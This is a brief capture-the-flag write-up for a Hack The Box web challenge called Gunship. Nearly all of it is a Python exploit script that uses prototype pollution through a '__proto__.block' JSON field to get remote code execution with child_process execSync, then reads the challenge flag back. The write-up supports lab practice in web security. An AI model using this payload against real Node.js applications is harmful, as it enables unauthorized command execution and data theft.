https://app.hackthebox.com/challenges/245

Description

A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world… all the wooing in the world to make you feel more lonely… this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶

Exploitation

#!/usr/bin/python3
import requests,sys

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}/"

TARGET_URL = get_base_url()
r = requests.post(TARGET_URL+'/api/submit', json = {
    "artist.name":"Gingell",
    "__proto__.block": {
    "type": "Text",
    "line":
    "console.log(process.mainModule.require('child_process').execSync('cat flag* > /app/static/out').toString())"
}
})

print(r.status_code)
print(r.text)
print(requests.get(TARGET_URL+'/static/out').text)

Summary

Gunship: identify the broken request handling, prove control, and use it to recover the flag.